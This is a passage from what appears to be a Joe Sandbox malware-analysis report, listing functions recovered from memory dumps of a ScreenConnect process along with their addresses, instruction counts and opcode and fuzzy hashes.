                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7ea1e759d430f719369752fd323539a30ae4e4fb768ed6fd83fa652e59265a64
                                                                                                                                                                                                                                                        • Instruction ID: 31579310e0c78ac91b30a65f924145ff658c57c7c15fbd1949581b3c92a41896
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ea1e759d430f719369752fd323539a30ae4e4fb768ed6fd83fa652e59265a64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8313970600B05CFD730CF69C84866AB7F6EF89321B108B5CD49A9B6A5D770E986CF80
                                                                                                                                                                                                                                                        Function 019190A8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6dfd9fc4988c7644ab6035a91a3562912b0c9bdd775dde83b27174a7a263647e
                                                                                                                                                                                                                                                        • Instruction ID: 54758585088ef8f8cc9df1eae9ebae6607eb505f98f57eef66007c2e0e07a90c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dfd9fc4988c7644ab6035a91a3562912b0c9bdd775dde83b27174a7a263647e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76315630600705CFD730CF29C898A6AB7F5FF89225B144A2CD49ADB7A4D730E985CB91
                                                                                                                                                                                                                                                        Function 019136B0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ec4b40a9b963a8e9da14d96baf38bba1ba2ebfe5913d97972d1e84c6edca89d9
                                                                                                                                                                                                                                                        • Instruction ID: 6c44135b1c83f018fa3a731390bbf2b2615b6d74a7552089a38fa84e7a3054f0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec4b40a9b963a8e9da14d96baf38bba1ba2ebfe5913d97972d1e84c6edca89d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D314270A00248CFCB01DF74DA4849EBFB6FF45324B1081AAD91ADB296CB349E02CB61
                                                                                                                                                                                                                                                        Function 0191D9B0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c0e4fb4393ea56397f37e4254863b3320a2f2efc6374332d44bfd3cc962d98cc
                                                                                                                                                                                                                                                        • Instruction ID: e5bb7c6dfc909aa6cd0da0fcdb01e1dd22216d6c09222c3bcfb9c83091cb15c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0e4fb4393ea56397f37e4254863b3320a2f2efc6374332d44bfd3cc962d98cc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23313A34600705CFD730DF6AC84865AB7F5EF89211B108A1CD49A9B7A5D730E986CF90
                                                                                                                                                                                                                                                        Function 040D0040 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f957bff903167329a4abd04766ed4890b48e40a94ae94ecab125201d4b81da33
                                                                                                                                                                                                                                                        • Instruction ID: da30e05b202735640dbb87415aaaa01b71b2d8ae1c5426b80083b9e33a520d42
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f957bff903167329a4abd04766ed4890b48e40a94ae94ecab125201d4b81da33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88217E30B013089FDB68DF65D4987AE7BB6EF88705F10402AE406A7384DF70AE45CB95
                                                                                                                                                                                                                                                        Function 040D1BF1 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c81321ae4de0278a44fcfb8715802a1f437c53a29dcbe6a5848ea7f61b4d361d
                                                                                                                                                                                                                                                        • Instruction ID: 9d49402feee4aec967b963e0d5172c08bba1f120b8ae294695c914823ce9e1fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c81321ae4de0278a44fcfb8715802a1f437c53a29dcbe6a5848ea7f61b4d361d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6921A2B4F002459FDB01DBA8E8545AE7BB1FF99300F008999D501BB361DF30AE168BA2
                                                                                                                                                                                                                                                        Function 0191E4F1 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 693e1652e4a469a05f96d71ce5f2068d8ac9cd8d2cd32986f68be2556cb44a0c
                                                                                                                                                                                                                                                        • Instruction ID: 2e11b5df73b2f5ce33d58db93b0a1b7bc5671a2f39e9110e19e109a8cfe8c0e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 693e1652e4a469a05f96d71ce5f2068d8ac9cd8d2cd32986f68be2556cb44a0c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9821C731B052099FDF199B65C454BAEBFB6BBC8710F18846CE406A7385FE709C41CB54
                                                                                                                                                                                                                                                        Function 018BD59C Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e70b0cd3e6556891a60fe9df4bc22ce2f30c86797b6417b5c78c41feb1eb37a
                                                                                                                                                                                                                                                        • Instruction ID: baae737dc9269c7b0c41ce6df998a76fe6961f76597d73510c7178a4073b5899
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e70b0cd3e6556891a60fe9df4bc22ce2f30c86797b6417b5c78c41feb1eb37a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E2145B2500204EFDB05DF44C8C0B66BF65FB88328F24C269E9098B347C336D556CAA2
                                                                                                                                                                                                                                                        Function 01918C20 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d44b0830b5cff4c4146a276220be9815ca8197d7698028ba76176fedebd569e0
                                                                                                                                                                                                                                                        • Instruction ID: a30cc5c54caa629856f12ca7ca7e8e764193448a7342cb6e021b742dc6e4c5e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d44b0830b5cff4c4146a276220be9815ca8197d7698028ba76176fedebd569e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0821A471B003055BE701EB68D9907EE77A2EFD5210F508529D445EB345DB74AE068BD2
                                                                                                                                                                                                                                                        Function 040D4660 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17bd3908657065b5a39821ac8ece9ee501620919042bec3e0f5e4960863d693c
                                                                                                                                                                                                                                                        • Instruction ID: a174f861c08850c62c4685cf2249b360902d4d00b4358c9578834365083ea71c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17bd3908657065b5a39821ac8ece9ee501620919042bec3e0f5e4960863d693c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6021EA35A102198FDB14EFA8D854BDDBBF1AF89314F118469D406BB3A0DAB4AD84CB91
                                                                                                                                                                                                                                                        Function 0191E190 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a3891548af2c556b633ef4e9513aa09626a6b33452eaf4d98f2e22fd5298bf31
                                                                                                                                                                                                                                                        • Instruction ID: 93ca02330c8b374c9ab391c0f7fa7a6493cc791d16684443447a2a45c5cf449d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3891548af2c556b633ef4e9513aa09626a6b33452eaf4d98f2e22fd5298bf31
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1121A171A003069FDB00DB68D880AEEBBB1FF85210B408929D55AEB315DB71FD45CBE1
                                                                                                                                                                                                                                                        Function 0191ED68 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 88e4dde596db4c48ac60f2dde0daecb850a9d505a08cc846b5c50487d1099b07
                                                                                                                                                                                                                                                        • Instruction ID: 7472ac98231162058a04ea0cade30ba6a305543aa3aa52032bd6105da79550c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e4dde596db4c48ac60f2dde0daecb850a9d505a08cc846b5c50487d1099b07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6218B31D1070A9EDB02EFB9C8505EAFBB4EF9A310F10CA2AD559A7111FB70A2D5C791
                                                                                                                                                                                                                                                        Function 019136A0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8abeef9aaf732bfe515ce6f818f4fd2a96e339313cb4317a62d140753358a45c
                                                                                                                                                                                                                                                        • Instruction ID: dd102baeb23fd1611178e58e95b10f32f00aa4e43e3f3a31c01e11794c4bad14
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8abeef9aaf732bfe515ce6f818f4fd2a96e339313cb4317a62d140753358a45c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 432102B1A00215CFCB149F68DA484AEBBBAFF883317008569D91AE7348DB309E42CF51
                                                                                                                                                                                                                                                        Function 040D0738 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0476ed006fa374ce1f79e259a3621da4f103175ebb35c8205ac865f6794955bf
                                                                                                                                                                                                                                                        • Instruction ID: 0d878952a434f83ffc84e39e95a194a29f24ebe38f01dc017df774326463388f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0476ed006fa374ce1f79e259a3621da4f103175ebb35c8205ac865f6794955bf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221C334F413098FDB19DF60D4547ED7BF2AB88319F144038D40ABB294DA716946CFA0
                                                                                                                                                                                                                                                        Function 019186D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3e2a79dd873220eefcb2ccefd5a084de98ab6ca6c2b273659f218c381aa41898
                                                                                                                                                                                                                                                        • Instruction ID: be73634ca2d75ae1ffea26498bcee6e50540b1a2d73b658430f07dc5a6f12437
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e2a79dd873220eefcb2ccefd5a084de98ab6ca6c2b273659f218c381aa41898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4215E30200B059FD734CF26D844A9ABBF5EF84321F148A2CD497976A5DB31E99ACF90
                                                                                                                                                                                                                                                        Function 040D0748 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5d69ab237477e243dd695a7e4aa7bd9ac3f18592e99b323b80f13f34875ae6a3
                                                                                                                                                                                                                                                        • Instruction ID: 71e83c2d3e541802a6e133caa9bae395ea360dfc38cf77bcdc93de2d0da25366
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d69ab237477e243dd695a7e4aa7bd9ac3f18592e99b323b80f13f34875ae6a3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6218E34F413098BDB64DF65C454BAEBBF2BB88715F148028E406BB280DA716D46CFA5
                                                                                                                                                                                                                                                        Function 0191A7B8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 57bc5b88e0b7e8412abad85154937415b01f4eab10dba69d0277767e508a0f57
                                                                                                                                                                                                                                                        • Instruction ID: 3cea7670cbdb7ee082f8e8d56c7d70e874ab0607ad7ea5815c4358be7467eb6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57bc5b88e0b7e8412abad85154937415b01f4eab10dba69d0277767e508a0f57
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9214F70A01B458FD724DF39D844A6ABBF5FF48310B108A6CD8AA87694E770ED42CF81
                                                                                                                                                                                                                                                        Function 0191EB70 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 121c255bcef0b1dffa54c3ea73be077d5d67155805b5da3703bfaaf61c33238e
                                                                                                                                                                                                                                                        • Instruction ID: 2397f7444e30ce12368a63f336c32a0bc9c817f2835c8b79c8ab00f1780bb958
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 121c255bcef0b1dffa54c3ea73be077d5d67155805b5da3703bfaaf61c33238e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9118E716093489FEB06CF19E460EC97FB6FF853247058097E84ACB296C631DC82CB20
                                                                                                                                                                                                                                                        Function 01918C30 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d242c6a0324a452ce34a0d1b7774d19efb55f0423913de8fac0a96010e55c07
                                                                                                                                                                                                                                                        • Instruction ID: bafee00ede2e257f36e2a7405315d6980d937d85ce303ec0d1519db6bcf96d5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d242c6a0324a452ce34a0d1b7774d19efb55f0423913de8fac0a96010e55c07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 901190717002056BE700EB68D980BAEB7A6EFC5610F50C529D945FB384DF70BE068BE2
                                                                                                                                                                                                                                                        Function 0191F880 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 11c06800521c52092e08e6f98af8ac57b768f8c36b657df469bbb63f4c43657c
                                                                                                                                                                                                                                                        • Instruction ID: bc620a0d719900fbf450cb9a4f294b32213c2eb93fa5873dcfc4f14d1e5f908b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11c06800521c52092e08e6f98af8ac57b768f8c36b657df469bbb63f4c43657c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A2107B6C003599FDB10CF9AD844ADEBBF5FB48310F148469E929A7210C379A555CFA1
                                                                                                                                                                                                                                                        Function 0191E1A0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cbf92d35550a92ac5471acf171d1699211447aa10eb787bb50b2fffa65b33385
                                                                                                                                                                                                                                                        • Instruction ID: b8c3652b8db0eff289bbb833605cff1d1fa617896d7f8b2afe3fbe59e62bdd7e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbf92d35550a92ac5471acf171d1699211447aa10eb787bb50b2fffa65b33385
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B117F71A0030A9FDB00DBA8D880AAEB7F5FF89210B508929E559FB314DB71FD458BD5
                                                                                                                                                                                                                                                        Function 0191A9A1 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 22247e6dca81f4efb6790ccd4c65010219ac45d883e97b1df7d306958b9aad88
                                                                                                                                                                                                                                                        • Instruction ID: 0c32d3085ae82f4d88eac8782a8c16b445a822c3172363006465690575657721
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22247e6dca81f4efb6790ccd4c65010219ac45d883e97b1df7d306958b9aad88
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2011763670E3C50FDB074B38A82009A7FF6AF8711431848EBC489DF243DA24DC0A8791
                                                                                                                                                                                                                                                        Function 040D4F8B Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e2e69db683f9eb0c2de4da0b496eb6490bb493f5e8a75bebe772ff14b3866b5d
                                                                                                                                                                                                                                                        • Instruction ID: 2e9b018978186edbd61bbb82767f95d507ea72e22a3429b8d5989904fd1fd48d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2e69db683f9eb0c2de4da0b496eb6490bb493f5e8a75bebe772ff14b3866b5d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301F9716093406FD302AB39E8514DA7FB1EE83214305C5ABE045CB263DA39AA0BCBA1
                                                                                                                                                                                                                                                        Function 0191484C Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 36f8b9cc76d865e92f948f2fb496f0c23455c6c03feea3a86315cfd75fc6648c
                                                                                                                                                                                                                                                        • Instruction ID: c9a0db081899fa57f9b52abde6931cfcf139410a02bc6a42c0470b4b143e82a9
